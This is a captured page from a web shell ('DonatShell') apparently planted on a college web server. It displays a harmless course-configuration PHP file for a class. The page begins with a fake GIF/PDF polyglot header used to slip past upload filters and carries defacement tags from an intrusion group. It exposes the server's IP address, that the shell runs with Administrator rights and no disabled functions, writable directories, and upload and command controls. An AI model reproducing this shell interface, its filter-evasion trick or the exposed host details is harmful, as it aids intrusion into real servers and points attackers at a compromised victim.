GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/MichaelMalz/CST1611/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/MichaelMalz/CST1611/classInfo.phpinc
<?
// JimMartinson/CST1611/classInfo.phpinc

debugTrackBegin();
#if (dc()) echo "<b>".__FILE__."</b><br>\n";
// Class information.
$class = array();
$class['credits'] = 3;
$class['lectureHours'] = $class['credits'] * 16;
$class['labHours'] = 0;

$class['startDate'] = array();
$class['meetingTime'] = array();

#d_Var("\$_SESSION['YRTR']",$_SESSION['YRTR'],'d');
switch ($_SESSION['YRTR']['User']) {
	case '20255':
		$class['startDate'][] = "2025-01-16";
		$class['meetingTime'][] = "2:00pm-4:30pm";
		#$class['meetingTime'][] = "1:00pm-3:30pm";
	break;
	case '20225':
		$class['startDate'][] = "2022-01-12";
		$class['meetingTime'][] = "9:00am-11:30am";
		#$class['meetingTime'][] = "1:00pm-3:30pm";
	break;
	case '20235':
		$class['startDate'][] = "2023-01-12";
		#$class['meetingTime'][] = "9:00am-11:30am";
		$class['meetingTime'][] = "1:00pm-3:30pm";
	break;
	default:
		require('JimMartinson/Page_Not_Available.phpinc');
}
#d_Var('$class',$class,'d');

// Textbook information.
$textbook = array();
/** /
$textbook['Title1'] = '';
$textbook['Edition1'] = "";
$textbook['Author1'] = '';
$textbook['Publisher1'] = '';
$textbook['Copyright1'] = '';
$textbook['ISBN1'] = '';
if ($textbook['Edition1'] != '') { $textbook['Edition1Edition'] = " <i>".$textbook['Edition1']." Edition</i>"; } else { $textbook['Edition1Edition'] = ''; }
$textbook['textbook1'] = $textbook['Title1']."<br>";
if ($textbook['Edition1'] !='') $textbook['textbook1'] .= "Edition: ".$textbook['Edition1']."<br>";
$textbook['textbook1'] .= $textbook['Author1']."<br>";
$textbook['textbook1'] .= $textbook['Publisher1']." ".$textbook['Copyright1']."<br>";
$textbook['textbook1'] .= $textbook['ISBN1'];
$textbook['Title2'] = '<i>'."BOOK_TITLE".'</i>';
$textbook['Edition2'] = "EDITION_NUMBER";
$textbook['Author2'] = "AUTHOR";
$textbook['Publisher2'] = "PUBLISHER";
$textbook['Copyright2'] = '&copy;'."YEAR";
$textbook['ISBN2'] = 'ISBN: '."ISBN_NUMBER";
if ($textbook['Edition2'] != '') { $textbook['Edition2Edition'] = " <i>".$textbook['Edition2']." Edition</i>"; } else { $textbook['Edition2Edition'] = ''; }
$textbook['textbook2'] = $textbook['Title2']."<br>";
if ($textbook['Edition2'] !='') $textbook['textbook2'] .= "Edition: ".$textbook['Edition2']."<br>";
$textbook['textbook2'] .= $textbook['Author2']."<br>";
$textbook['textbook2'] .= $textbook['Publisher2']." ".$textbook['Copyright2']."<br>";
$textbook['textbook2'] .= $textbook['ISBN2'];
/**/

require('Course/classHours.phpinc');

debugTrackEnd();
?>

Anon7 - 2022
AnonSec Team